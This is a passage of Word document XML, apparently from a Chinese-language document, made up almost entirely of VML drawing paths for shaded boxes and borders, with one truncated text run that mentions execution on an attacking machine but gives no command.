          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>击机执行：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558.500pt;width:0.500pt;height:156.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,11170" coordsize="10,3130">
        <v:shape style="position:absolute;left:10390;top:11170;width:10;height:3130" coordorigin="10390,11170" coordsize="10,3130" path="m10402,11175l10402,11175,10402,11175,10402,11175,10402,11175,10402,11175,10402,11175,10402,11175,10402,11175,10402,11176,10402,11176,10402,11176,10402,11177,10402,11178,10402,11179,10402,11180,10402,11181,10402,11182,10402,11184,10402,11185,10402,11187,10402,11189,10402,11192,10402,11194,10402,11197,10402,11200,10402,11204,10402,11207,10402,11211,10402,11215,10402,11220,10402,11225,10402,11230,10402,11235,10402,11241,10402,11247,10402,11254,10402,11261,10402,11268,10402,11276,10402,11285,10402,11293,10402,11302,10402,11312,10402,11322,10402,11332,10402,11343,10402,11355,10402,11367,10402,11379,10402,11393,10402,11406,10402,11420,10402,11435,10402,11450,10402,11466,10402,11483,10402,11500,10402,11518,10402,11536,10402,11555,10402,11575,10402,11595,10402,11616,10402,11638,10402,11660,10402,11683,10402,11707,10402,11732,10402,11757,10402,11783,10402,11810,10402,11838,10402,11866,10402,11895,10402,11925,10402,11956,10402,11988,10402,12020,10402,12054,10402,12088,10402,12123,10402,12159,10402,12196,10402,12234,10402,12273,10402,12312,10402,12353,10402,12394,10402,12437,10402,12481,10402,12525,10402,12571,10402,12617,10402,12665,10402,12713,10402,12763,10402,12814,10402,12865,10402,12918,10402,12972,10402,13027,10402,13083,10402,13140,10402,13199,10402,13258,10402,13319,10402,13381,10402,13444,10402,13508,10402,13574,10402,13640,10402,13708,10402,13777,10402,13847,10402,13919,10402,13992,10402,14066,10402,14141,10402,14218,10402,14296e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:557.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11150" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:11150;width:8990;height:670" coordorigin="1490,11150" coordsize="8990,670" path="m1510,11175l1510,11175,1510,11175,1510,11175,1510,11175,1510,11175,1510,11175,1511,11175,1512,11175,1512,11175,1514,11175,1515,11175,1517,11175,1519,11175,1521,11175,1524,11175,1528,11175,1532,11175,1536,11175,1541,11175,1546,11175,1552,11175,1559,11175,1566,11175,1575,11175,1583,11175,1593,11175,1603,11175,1615,11175,1627,11175,1640,11175,1654,11175,1668,11175,1684,11175,1701,11175,1719,11175,1738,11175,1758,11175,1780,11175,1802,11175,1826,11175,1851,11175,1877,11175,1904,11175,1933,11175,1963,11175,1995,11175,2028,11175,2063,11175,2099,11175,2136,11175,2175,11175,2216,11175,2259,11175,2303,11175,2348,11175,2396,11175,2445,11175,2496,11175,2549,11175,2604,11175,2660,11175,2719,11175,2779,11175,2841,11175,2906,11175,2972,11175,3041,11175,3112,11175,3184,11175,3259,11175,3336,11175,3416,11175,3498,11175,3582,11175,3668,11175,3757,11175,3848,11175,3941,11175,4037,11175,4136,11175,4236,11175,4340,11175,4446,11175,4555,11175,4666,11175,4780,11175,4897,11175,5017,11175,5139,11175,5264,11175,5392,11175,5523,11175,5657,11175,5793,11175,5933,11175,6076,11175,6222,11175,6370,11175,6522,11175,6677,11175,6835,11175,6997,11175,7161,11175,7329,11175,7500,11175,7675,11175,7853,11175,8034,11175,8219,11175,8407,11175,8598,11175,8793,11175,8992,11175,9194,11175,9400,11175,9609,11175,9823,11175,10039,11175,10260,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11175,10484,11176,10484,11176,10484,11176,10484,11177,10484,11177,10484,11177,10484,11178,10484,11178,10484,11179,10484,11179,10484,11180,10484,11181,10484,11182,10484,11182,10484,11183,10484,11184,10484,11185,10484,11186,10484,11187,10484,11189,10484,11190,10484,11191,10484,11193,10484,11194,10484,11196,10484,11198,10484,11200,10484,11202,10484,11204,10484,11206,10484,11208,10484,11210,10484,11213,10484,11215,10484,11218,10484,11221,10484,11224,10484,11227,10484,11230,10484,11233,10484,11236,10484,11240,10484,11243,10484,11247,10484,11251,10484,11255,10484,11259,10484,11264,10484,11268,10484,11273,10484,11277,10484,11282,10484,11287,10484,11292,10484,11298,10484,11303,10484,11309,10484,11315,10484,11321,10484,11327,10484,11333,10484,11340,10484,11347,10484,11354,10484,11361,10484,11368,10484,11375,10484,11383,10484,11391,10484,11399,10484,11407,10484,11415,10484,11424,10484,11433,10484,11442,10484,11451,10484,11460,10484,11470,10484,11480,10484,11490,10484,11500,10484,11511,10484,11521,10484,11532,10484,11543,10484,11555,10484,11566,10484,11578,10484,11590,10484,11603,10484,11615,10484,11628,10484,11641,10484,11655,10484,11668,10484,11682,10484,11696,10484,11711,10484,11725,10484,11740,10484,11755,10484,11771,10484,11786,10484,11802,10484,11818,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10483,11835,10482,11835,10482,11835,10480,11835,10479,11835,10477,11835,10475,11835,10473,11835,10470,11835,10466,11835,10462,11835,10458,11835,10453,11835,10448,11835,10442,11835,10435,11835,10428,11835,10419,11835,10411,11835,10401,11835,10391,11835,10379,11835,10367,11835,10354,11835,10340,11835,10326,11835,10310,11835,10293,11835,10275,11835,10256,11835,10236,11835,10215,11835,10192,11835,10168,11835,10143,11835,10117,11835,10090,11835,10061,11835,10031,11835,9999,11835,9966,11835,9931,11835,9895,11835,9858,11835,9819,11835,9778,11835,9735,11835,9691,11835,9646,11835,9598,11835,9549,11835,9498,11835,9445,11835,9391,11835,9334,11835,9275,11835,9215,11835,9153,11835,9088,11835,9022,11835,8953,11835,8883,11835,8810,11835,8735,11835,8658,11835,8578,11835,8497,11835,8413,11835,8326,11835,8238,11835,8146,11835,8053,11835,7957,11835,7859,11835,7758,11835,7654,11835,7548,11835,7439,11835,7328,11835,7214,11835,7097,11835,6977,11835,6855,11835,6730,11835,6602,11835,6471,11835,6337,11835,6201,11835,6061,11835,5918,11835,5773,11835,5624,11835,5472,11835,5317,11835,5159,11835,4997,11835,4833,11835,4665,11835,4494,11835,4319,11835,4141,11835,3960,11835,3776,11835,3587,11835,3396,11835,3201,11835,3002,11835,2800,11835,2594,11835,2385,11835,2172,11835,1955,11835,1734,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11834,1510,11834,1510,11834,1510,11834,1510,11834,1510,11833,1510,11833,1510,11833,1510,11832,1510,11832,1510,11831,1510,11831,1510,11830,1510,11830,1510,11829,1510,11828,1510,11827,1510,11826,1510,11825,1510,11824,1510,11823,1510,11822,1510,11821,1510,11820,1510,11818,1510,11817,1510,11815,1510,11813,1510,11812,1510,11810,1510,11808,1510,11806,1510,11804,1510,11802,1510,11799,1510,11797,1510,11794,1510,11792,1510,11789,1510,11786,1510,11783,1510,11780,1510,11777,1510,11773,1510,11770,1510,11766,1510,11762,1510,11759,1510,11754,1510,11750,1510,11746,1510,11742,1510,11737,1510,11732,1510,11727,1510,11722,1510,11717,1510,11712,1510,11706,1510,11701,1510,11695,1510,11689,1510,11683,1510,11676,1510,11670,1510,11663,1510,11656,1510,11649,1510,11642,1510,11634,1510,11627,1510,11619,1510,11611,1510,11603,1510,11594,1510,11586,1510,11577,1510,11568,1510,11559,1510,11549,1510,11540,1510,11530,1510,11520,1510,11509,1510,11499,1510,11488,1510,11477,1510,11466,1510,11455,1510,11443,1510,11431,1510,11419,1510,11407,1510,11394,1510,11381,1510,11368,1510,11355,1510,11341,1510,11328,1510,11313,1510,11299,1510,11284,1510,11270,1510,11254,1510,11239,1510,11223,1510,11207,1510,11191,1510,11175e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:558.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11170" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:11170;width:8990;height:10" coordorigin="1490,11170" coordsize="8990,10" path="m1510,11182l1510,11182,1510,11182,1510,11182,1510,11182,1510,11182,1510,11182,1511,11182,1512,11182,1512,11182,1514,11182,1515,11182,1517,11182,1519,11182,1521,11182,1524,11182,1528,11182,1532,11182,1536,11182,1541,11182,1546,11182,1552,11182,1559,11182,1566,11182,1575,11182,1583,11182,1593,11182,1603,11182,1615,11182,1627,11182,1640,11182,1654,11182,1668,11182,1684,11182,1701,11182,1719,11182,1738,11182,1758,11182,1780,11182,1802,11182,1826,11182,1851,11182,1877,11182,1904,11182,1933,11182,1963,11182,1995,11182,2028,11182,2063,11182,2099,11182,2136,11182,2175,11182,2216,11182,2259,11182,2303,11182,2348,11182,2396,11182,2445,11182,2496,11182,2549,11182,2604,11182,2660,11182,2719,11182,2779,11182,2841,11182,2906,11182,2972,11182,3041,11182,3112,11182,3184,11182,3259,11182,3336,11182,3416,11182,3498,11182,3582,11182,3668,11182,3757,11182,3848,11182,3941,11182,4037,11182,4136,11182,4236,11182,4340,11182,4446,11182,4555,11182,4666,11182,4780,11182,4897,11182,5017,11182,5139,11182,5264,11182,5392,11182,5523,11182,5657,11182,5793,11182,5933,11182,6076,11182,6222,11182,6370,11182,6522,11182,6677,11182,6835,11182,6997,11182,7161,11182,7329,11182,7500,11182,7675,11182,7853,11182,8034,11182,8219,11182,8407,11182,8598,11182,8793,11182,8992,11182,9194,11182,9400,11182,9609,11182,9823,11182,10039,11182,10260,11182,10484,11182e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:557.400pt;width:445.800pt;height:34.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:590.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11810" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:11810;width:8990;height:650" coordorigin="1490,11810" coordsize="8990,650" path="m1510,11835l1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1510,11835,1511,11835,1512,11835,1512,11835,1514,11835,1515,11835,1517,11835,1519,11835,1521,11835,1524,11835,1528,11835,1532,11835,1536,11835,1541,11835,1546,11835,1552,11835,1559,11835,1566,11835,1575,11835,1583,11835,1593,11835,1603,11835,1615,11835,1627,11835,1640,11835,1654,11835,1668,11835,1684,11835,1701,11835,1719,11835,1738,11835,1758,11835,1780,11835,1802,11835,1826,11835,1851,11835,1877,11835,1904,11835,1933,11835,1963,11835,1995,11835,2028,11835,2063,11835,2099,11835,2136,11835,2175,11835,2216,11835,2259,11835,2303,11835,2348,11835,2396,11835,2445,11835,2496,11835,2549,11835,2604,11835,2660,11835,2719,11835,2779,11835,2841,11835,2906,11835,2972,11835,3041,11835,3112,11835,3184,11835,3259,11835,3336,11835,3416,11835,3498,11835,3582,11835,3668,11835,3757,11835,3848,11835,3941,11835,4037,11835,4136,11835,4236,11835,4340,11835,4446,11835,4555,11835,4666,11835,4780,11835,4897,11835,5017,11835,5139,11835,5264,11835,5392,11835,5523,11835,5657,11835,5793,11835,5933,11835,6076,11835,6222,11835,6370,11835,6522,11835,6677,11835,6835,11835,6997,11835,7161,11835,7329,11835,7500,11835,7675,11835,7853,11835,8034,11835,8219,11835,8407,11835,8598,11835,8793,11835,8992,11835,9194,11835,9400,11835,9609,11835,9823,11835,10039,11835,10260,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11835,10484,11836,10484,11836,10484,11836,10484,11836,10484,11836,10484,11837,10484,11837,10484,11838,10484,11838,10484,11838,10484,11839,10484,11840,10484,11840,10484,11841,10484,11842,10484,11842,10484,11843,10484,11844,10484,11845,10484,11846,10484,11847,10484,11848,10484,11850,10484,11851,10484,11852,10484,11854,10484,11855,10484,11857,10484,11859,10484,11861,10484,11863,10484,11865,10484,11867,10484,11869,10484,11871,10484,11874,10484,11876,10484,11879,10484,11882,10484,11885,10484,11888,10484,11891,10484,11894,10484,11897,10484,11901,10484,11904,10484,11908,10484,11912,10484,11916,10484,11920,10484,11924,10484,11928,10484,11933,10484,11938,10484,11942,10484,11947,10484,11953,10484,11958,10484,11963,10484,11969,10484,11975,10484,11980,10484,11987,10484,11993,10484,11999,10484,12006,10484,12012,10484,12019,10484,12026,10484,12034,10484,12041,10484,12049,10484,12057,10484,12065,10484,12073,10484,12081,10484,12090,10484,12099,10484,12108,10484,12117,10484,12126,10484,12136,10484,12146,10484,12156,10484,12166,10484,12176,10484,12187,10484,12198,10484,12209,10484,12220,10484,12232,10484,12244,10484,12256,10484,12268,10484,12280,10484,12293,10484,12306,10484,12319,10484,12333,10484,12347,10484,12360,10484,12375,10484,12389,10484,12404,10484,12419,10484,12434,10484,12450,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10483,12465,10482,12465,10482,12465,10480,12465,10479,12465,10477,12465,10475,12465,10473,12465,10470,12465,10466,12465,10462,12465,10458,12465,10453,12465,10448,12465,10442,12465,10435,12465,10428,12465,10419,12465,10411,12465,10401,12465,10391,12465,10379,12465,10367,12465,10354,12465,10340,12465,10326,12465,10310,12465,10293,12465,10275,12465,10256,12465,10236,12465,10215,12465,10192,12465,10168,12465,10143,12465,10117,12465,10090,12465,10061,12465,10031,12465,9999,12465,9966,12465,9931,12465,9895,12465,9858,12465,9819,12465,9778,12465,9735,12465,9691,12465,9646,12465,9598,12465,9549,12465,9498,12465,9445,12465,9391,12465,9334,12465,9275,12465,9215,12465,9153,12465,9088,12465,9022,12465,8953,12465,8883,12465,8810,12465,8735,12465,8658,12465,8578,12465,8497,12465,8413,12465,8326,12465,8238,12465,8146,12465,8053,12465,7957,12465,7859,12465,7758,12465,7654,12465,7548,12465,7439,12465,7328,12465,7214,12465,7097,12465,6977,12465,6855,12465,6730,12465,6602,12465,6471,12465,6337,12465,6201,12465,6061,12465,5918,12465,5773,12465,5624,12465,5472,12465,5317,12465,5159,12465,4997,12465,4833,12465,4665,12465,4494,12465,4319,12465,4141,12465,3960,12465,3776,12465,3587,12465,3396,12465,3201,12465,3002,12465,2800,12465,2594,12465,2385,12465,2172,12465,1955,12465,1734,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12464,1510,12464,1510,12464,1510,12464,1510,12463,1510,12463,1510,12463,1510,12462,1510,12462,1510,12461,1510,12461,1510,12460,1510,12459,1510,12459,1510,12458,1510,12457,1510,12456,1510,12455,1510,12454,1510,12453,1510,12452,1510,12451,1510,12449,1510,12448,1510,12446,1510,12445,1510,12443,1510,12441,1510,12440,1510,12438,1510,12436,1510,12433,1510,12431,1510,12429,1510,12426,1510,12424,1510,12421,1510,12419,1510,12416,1510,12413,1510,12410,1510,12406,1510,12403,1510,12400,1510,12396,1510,12392,1510,12388,1510,12384,1510,12380,1510,12376,1510,12372,1510,12367,1510,12363,1510,12358,1510,12353,1510,12348,1510,12342,1510,12337,1510,12331,1510,12326,1510,12320,1510,12314,1510,12307,1510,12301,1510,12295,1510,12288,1510,12281,1510,12274,1510,12266,1510,12259,1510,12251,1510,12244,1510,12236,1510,12227,1510,12219,1510,12210,1510,12202,1510,12193,1510,12183,1510,12174,1510,12164,1510,12155,1510,12145,1510,12134,1510,12124,1510,12113,1510,12102,1510,12091,1510,12080,1510,12068,1510,12057,1510,12045,1510,12032,1510,12020,1510,12007,1510,11994,1510,11981,1510,11967,1510,11954,1510,11940,1510,11926,1510,11911,1510,11896,1510,11881,1510,11866,1510,11851,1510,11835e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:591.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11830" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:11830;width:30;height:630" coordorigin="1490,11830" coordsize="30,630" path="m1517,11835l1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11835,1517,11836,1517,11836,1517,11836,1517,11836,1517,11836,1517,11837,1517,11837,1517,11838,1517,11838,1517,11838,1517,11839,1517,11840,1517,11840,1517,11841,1517,11842,1517,11842,1517,11843,1517,11844,1517,11845,1517,11846,1517,11847,1517,11848,1517,11850,1517,11851,1517,11852,1517,11854,1517,11855,1517,11857,1517,11859,1517,11861,1517,11863,1517,11865,1517,11867,1517,11869,1517,11871,1517,11874,1517,11876,1517,11879,1517,11882,1517,11885,1517,11888,1517,11891,1517,11894,1517,11897,1517,11901,1517,11904,1517,11908,1517,11912,1517,11916,1517,11920,1517,11924,1517,11928,1517,11933,1517,11938,1517,11942,1517,11947,1517,11953,1517,11958,1517,11963,1517,11969,1517,11975,1517,11980,1517,11987,1517,11993,1517,11999,1517,12006,1517,12012,1517,12019,1517,12026,1517,12034,1517,12041,1517,12049,1517,12057,1517,12065,1517,12073,1517,12081,1517,12090,1517,12099,1517,12108,1517,12117,1517,12126,1517,12136,1517,12146,1517,12156,1517,12166,1517,12176,1517,12187,1517,12198,1517,12209,1517,12220,1517,12232,1517,12244,1517,12256,1517,12268,1517,12280,1517,12293,1517,12306,1517,12319,1517,12333,1517,12347,1517,12360,1517,12375,1517,12389,1517,12404,1517,12419,1517,12434,1517,12450,1517,12465e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:622.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12450" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:12450;width:8990;height:390" coordorigin="1490,12450" coordsize="8990,390" path="m1510,12465l1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1510,12465,1511,12465,1512,12465,1512,12465,1514,12465,1515,12465,1517,12465,1519,12465,1521,12465,1524,12465,1528,12465,1532,12465,1536,12465,1541,12465,1546,12465,1552,12465,1559,12465,1566,12465,1575,12465,1583,12465,1593,12465,1603,12465,1615,12465,1627,12465,1640,12465,1654,12465,1668,12465,1684,12465,1701,12465,1719,12465,1738,12465,1758,12465,1780,12465,1802,12465,1826,12465,1851,12465,1877,12465,1904,12465,1933,12465,1963,12465,1995,12465,2028,12465,2063,12465,2099,12465,2136,12465,2175,12465,2216,12465,2259,12465,2303,12465,2348,12465,2396,12465,2445,12465,2496,12465,2549,12465,2604,12465,2660,12465,2719,12465,2779,12465,2841,12465,2906,12465,2972,12465,3041,12465,3112,12465,3184,12465,3259,12465,3336,12465,3416,12465,3498,12465,3582,12465,3668,12465,3757,12465,3848,12465,3941,12465,4037,12465,4136,12465,4236,12465,4340,12465,4446,12465,4555,12465,4666,12465,4780,12465,4897,12465,5017,12465,5139,12465,5264,12465,5392,12465,5523,12465,5657,12465,5793,12465,5933,12465,6076,12465,6222,12465,6370,12465,6522,12465,6677,12465,6835,12465,6997,12465,7161,12465,7329,12465,7500,12465,7675,12465,7853,12465,8034,12465,8219,12465,8407,12465,8598,12465,8793,12465,8992,12465,9194,12465,9400,12465,9609,12465,9823,12465,10039,12465,10260,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12465,10484,12466,10484,12466,10484,12466,10484,12466,10484,12466,10484,12466,10484,12466,10484,12466,10484,12467,10484,12467,10484,12467,10484,12467,10484,12468,10484,12468,10484,12468,10484,12469,10484,12469,10484,12470,10484,12470,10484,12471,10484,12471,10484,12472,10484,12473,10484,12473,10484,12474,10484,12475,10484,12476,10484,12477,10484,12477,10484,12478,10484,12480,10484,12481,10484,12482,10484,12483,10484,12484,10484,12486,10484,12487,10484,12488,10484,12490,10484,12491,10484,12493,10484,12495,10484,12497,10484,12498,10484,12500,10484,12502,10484,12504,10484,12507,10484,12509,10484,12511,10484,12513,10484,12516,10484,12518,10484,12521,10484,12524,10484,12526,10484,12529,10484,12532,10484,12535,10484,12538,10484,12542,10484,12545,10484,12548,10484,12552,10484,12555,10484,12559,10484,12563,10484,12567,10484,12571,10484,12575,10484,12579,10484,12584,10484,12588,10484,12593,10484,12597,10484,12602,10484,12607,10484,12612,10484,12617,10484,12622,10484,12628,10484,12633,10484,12639,10484,12644,10484,12650,10484,12656,10484,12662,10484,12668,10484,12675,10484,12681,10484,12688,10484,12695,10484,12702,10484,12709,10484,12716,10484,12723,10484,12730,10484,12738,10484,12746,10484,12754,10484,12762,10484,12770,10484,12778,10484,12787,10484,12795,10484,12804,10484,12813,10484,12822,10484,12831,10484,12840,10484,12840,10484,12840,10484,12840,10484,12840,10484,12840,10484,12840,10483,12840,10482,12840,10482,12840,10480,12840,10479,12840,10477,12840,10475,12840,10473,12840,10470,12840,10466,12840,10462,12840,10458,12840,10453,12840,10448,12840,10442,12840,10435,12840,10428,12840,10419,12840,10411,12840,10401,12840,10391,12840,10379,12840,10367,12840,10354,12840,10340,12840,10326,12840,10310,12840,10293,12840,10275,12840,10256,12840,10236,12840,10215,12840,10192,12840,10168,12840,10143,12840,10117,12840,10090,12840,10061,12840,10031,12840,9999,12840,9966,12840,9931,12840,9895,12840,9858,12840,9819,12840,9778,12840,9735,12840,9691,12840,9646,12840,9598,12840,9549,12840,9498,12840,9445,12840,9391,12840,9334,12840,9275,12840,9215,12840,9153,12840,9088,12840,9022,12840,8953,12840,8883,12840,8810,12840,8735,12840,8658,12840,8578,12840,8497,12840,8413,12840,8326,12840,8238,12840,8146,12840,8053,12840,7957,12840,7859,12840,7758,12840,7654,12840,7548,12840,7439,12840,7328,12840,7214,12840,7097,12840,6977,12840,6855,12840,6730,12840,6602,12840,6471,12840,6337,12840,6201,12840,6061,12840,5918,12840,5773,12840,5624,12840,5472,12840,5317,12840,5159,12840,4997,12840,4833,12840,4665,12840,4494,12840,4319,12840,4141,12840,3960,12840,3776,12840,3587,12840,3396,12840,3201,12840,3002,12840,2800,12840,2594,12840,2385,12840,2172,12840,1955,12840,1734,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12839,1510,12839,1510,12839,1510,12839,1510,12838,1510,12838,1510,12838,1510,12837,1510,12837,1510,12837,1510,12836,1510,12836,1510,12835,1510,12834,1510,12834,1510,12833,1510,12832,1510,12832,1510,12831,1510,12830,1510,12829,1510,12828,1510,12827,1510,12826,1510,12825,1510,12824,1510,12823,1510,12822,1510,12820,1510,12819,1510,12817,1510,12816,1510,12814,1510,12813,1510,12811,1510,12809,1510,12807,1510,12805,1510,12803,1510,12801,1510,12799,1510,12797,1510,12795,1510,12792,1510,12790,1510,12787,1510,12785,1510,12782,1510,12779,1510,12776,1510,12774,1510,12770,1510,12767,1510,12764,1510,12761,1510,12757,1510,12754,1510,12750,1510,12747,1510,12743,1510,12739,1510,12735,1510,12731,1510,12726,1510,12722,1510,12718,1510,12713,1510,12709,1510,12704,1510,12699,1510,12694,1510,12689,1510,12684,1510,12678,1510,12673,1510,12667,1510,12661,1510,12656,1510,12650,1510,12643,1510,12637,1510,12631,1510,12624,1510,12618,1510,12611,1510,12604,1510,12597,1510,12590,1510,12583,1510,12575,1510,12568,1510,12560,1510,12552,1510,12544,1510,12536,1510,12528,1510,12519,1510,12511,1510,12502,1510,12493,1510,12484,1510,12475,1510,12465e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:622.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12450" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:12450;width:30;height:390" coordorigin="1490,12450" coordsize="30,390" path="m1517,12465l1517,12465,1517,12465,1517,12465,1517,12465,1517,12465,1517,12465,1517,12465,1517,12465,1517,12465,1517,12465,1517,12466,1517,12466,1517,12466,1517,12466,1517,12466,1517,12466,1517,12466,1517,12466,1517,12467,1517,12467,1517,12467,1517,12467,1517,12468,1517,12468,1517,12468,1517,12469,1517,12469,1517,12470,1517,12470,1517,12471,1517,12471,1517,12472,1517,12473,1517,12473,1517,12474,1517,12475,1517,12476,1517,12477,1517,12477,1517,12478,1517,12480,1517,12481,1517,12482,1517,12483,1517,12484,1517,12486,1517,12487,1517,12488,1517,12490,1517,12491,1517,12493,1517,12495,1517,12497,1517,12498,1517,12500,1517,12502,1517,12504,1517,12507,1517,12509,1517,12511,1517,12513,1517,12516,1517,12518,1517,12521,1517,12524,1517,12526,1517,12529,1517,12532,1517,12535,1517,12538,1517,12542,1517,12545,1517,12548,1517,12552,1517,12555,1517,12559,1517,12563,1517,12567,1517,12571,1517,12575,1517,12579,1517,12584,1517,12588,1517,12593,1517,12597,1517,12602,1517,12607,1517,12612,1517,12617,1517,12622,1517,12628,1517,12633,1517,12639,1517,12644,1517,12650,1517,12656,1517,12662,1517,12668,1517,12675,1517,12681,1517,12688,1517,12695,1517,12702,1517,12709,1517,12716,1517,12723,1517,12730,1517,12738,1517,12746,1517,12754,1517,12762,1517,12770,1517,12778,1517,12787,1517,12795,1517,12804,1517,12813,1517,12822,1517,12831,1517,12840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:641.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12830" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:12830;width:8990;height:370" coordorigin="1490,12830" coordsize="8990,370" path="m1510,12840l1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1510,12840,1511,12840,1512,12840,1512,12840,1514,12840,1515,12840,1517,12840,1519,12840,1521,12840,1524,12840,1528,12840,1532,12840,1536,12840,1541,12840,1546,12840,1552,12840,1559,12840,1566,12840,1575,12840,1583,12840,1593,12840,1603,12840,1615,12840,1627,12840,1640,12840,1654,12840,1668,12840,1684,12840,1701,12840,1719,12840,1738,12840,1758,12840,1780,12840,1802,12840,1826,12840,1851,12840,1877,12840,1904,12840,1933,12840,1963,12840,1995,12840,2028,12840,2063,12840,2099,12840,2136,12840,2175,12840,2216,12840,2259,12840,2303,12840,2348,12840,2396,12840,2445,12840,2496,12840,2549,12840,2604,12840,2660,12840,2719,12840,2779,12840,2841,12840,2906,12840,2972,12840,3041,12840,3112,12840,3184,12840,3259,12840,3336,12840,3416,12840,3498,12840,3582,12840,3668,12840,3757,12840,3848,12840,3941,12840,4037,12840,4136,12840,4236,12840,4340,12840,4446,12840,4555,12840,4666,12840,4780,12840,4897,12840,5017,12840,5139,12840,5264,12840,5392,12840,5523,12840,5657,12840,5793,12840,5933,12840,6076,12840,6222,12840,6370,12840,6522,12840,6677,12840,6835,12840,6997,12840,7161,12840,7329,12840,7500,12840,7675,12840,7853,12840,8034,12840,8219,12840,8407,12840,8598,12840,8793,12840,8992,12840,9194,12840,9400,12840,9609,12840,9823,12840,10039,12840,10260,12840,10484,12840,10484,12840,10484,12840,10484,12840,10484,12840,10484,12840,10484,12840,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12841,10484,12842,10484,12842,10484,12842,10484,12842,10484,12842,10484,12843,10484,12843,10484,12843,10484,12844,10484,12844,10484,12845,10484,12845,10484,12846,10484,12846,10484,12847,10484,12847,10484,12848,10484,12849,10484,12850,10484,12850,10484,12851,10484,12852,10484,12853,10484,12854,10484,12855,10484,12856,10484,12857,10484,12859,10484,12860,10484,12861,10484,12863,10484,12864,10484,12866,10484,12867,10484,12869,10484,12871,10484,12872,10484,12874,10484,12876,10484,12878,10484,12880,10484,12882,10484,12884,10484,12887,10484,12889,10484,12891,10484,12894,10484,12896,10484,12899,10484,12902,10484,12905,10484,12908,10484,12911,10484,12914,10484,12917,10484,12920,10484,12924,10484,12927,10484,12931,10484,12934,10484,12938,10484,12942,10484,12946,10484,12950,10484,12954,10484,12958,10484,12963,10484,12967,10484,12972,10484,12976,10484,12981,10484,12986,10484,12991,10484,12996,10484,13002,10484,13007,10484,13012,10484,13018,10484,13024,10484,13030,10484,13036